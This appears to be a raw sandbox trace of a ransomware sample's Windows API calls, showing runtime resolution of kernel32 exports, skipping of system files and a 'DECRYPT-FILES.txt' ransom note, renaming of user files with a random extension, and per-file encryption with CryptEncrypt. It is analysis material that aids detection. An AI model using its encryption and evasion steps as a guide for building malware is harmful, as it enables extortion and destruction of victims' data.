[0083.469] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.469] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.469] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.469] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.469] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.469] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.469] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.470] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.470] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.470] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.470] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.470] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.470] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.470] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.470] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.470] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.470] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.470] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.470] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.470] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.470] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.470] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.470] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.470] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.470] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.470] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.471] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.471] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.471] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.471] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.471] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.471] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.471] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.471] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.471] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.471] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.471] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.471] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.471] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.471] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.471] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.471] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.471] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.471] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.471] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.472] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.472] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.472] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.472] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.472] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.472] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.472] lstrlenA (lpString="DELETEATOM") returned 10 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.472] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.472] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.472] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.472] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.472] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.472] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.472] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.472] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.472] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.473] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.473] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.473] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.473] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.473] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.473] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.473] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.473] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.473] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.473] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.473] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.473] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.473] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.473] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.473] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.473] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.473] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.473] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.473] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.474] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.474] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.474] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.474] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.474] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.474] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.474] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.474] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.474] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.474] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.474] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.474] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.474] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.474] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.474] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.474] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4") returned 58 [0083.475] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4.R8IoO5") returned 65 [0083.475] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m8ce6ka jefhefze.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4.R8IoO5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m8ce6ka jefhefze.mp4.r8ioo5"), dwFlags=0x0) returned 1 [0083.475] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.476] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.476] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95dc1c0, ftCreationTime.dwHighDateTime=0x1d4c941, ftLastAccessTime.dwLowDateTime=0xa5363ad0, ftLastAccessTime.dwHighDateTime=0x1d4cec9, ftLastWriteTime.dwLowDateTime=0xa5363ad0, ftLastWriteTime.dwHighDateTime=0x1d4cec9, nFileSizeHigh=0x0, nFileSizeLow=0x81f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngwb1v0Y3cEASEZtz_K.png", cAlternateFileName="NGWB1V~1.PNG")) returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="DECRYPT-FILES.txt") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="autorun.inf") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="boot.ini") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="desktop.ini") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="ntuser.dat") returned -1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="iconcache.db") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="bootsect.bak") returned 1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="ntuser.dat.log") returned -1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="thumbs.db") returned -1 [0083.476] lstrcmpiW (lpString1="ngwb1v0Y3cEASEZtz_K.png", lpString2="Bootfont.bin") returned 1 [0083.476] lstrlenW (lpString="ngwb1v0Y3cEASEZtz_K.png") returned 23 [0083.476] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0083.476] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0083.476] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0083.476] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0083.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.476] lstrlenW (lpString="ngwb1v0Y3cEASEZtz_K.png") returned 23 [0083.477] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.477] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ngwb1v0Y3cEASEZtz_K.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png" [0083.477] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ngwb1v0Y3cEASEZtz_K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngwb1v0y3ceaseztz_k.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.477] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=33273) returned 1 [0083.477] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.477] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.477] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.477] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.477] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.478] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.478] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.479] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.479] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.479] CloseHandle (hObject=0x43c) returned 1 [0083.479] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.479] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.480] CloseHandle (hObject=0x0) returned 0 [0083.480] CloseHandle (hObject=0x438) returned 1 [0083.480] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.481] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.481] GetTickCount () returned 0x114d569 [0083.481] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.481] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.481] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.481] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.482] lstrlenA (lpString="kernel32.dll") returned 12 [0083.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.482] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | 